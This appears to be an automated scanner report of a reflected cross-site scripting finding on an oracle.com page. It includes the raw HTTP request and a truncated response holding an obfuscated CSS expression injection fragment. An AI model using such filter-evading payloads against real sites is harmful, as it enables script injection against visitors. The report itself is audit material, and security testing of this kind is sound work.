1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.oracle.com |
Path: | /us/corporate/customers |
GET /us/corporate/customers Host: www.oracle.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_nr=1322871170148; gpw_e24=no%20value; s_sq=oraclecampus%3D |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Oracle-Application-Server Content-Length: 145522 Vary: Accept-Encoding Date: Sat, 03 Dec 2011 00:38:42 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head><meta http-equiv="Content-Type" content="text/html; charset=u ...[SNIP]... <meta name="country" content="" stYle="x:expre/**/ssion ...[SNIP]... |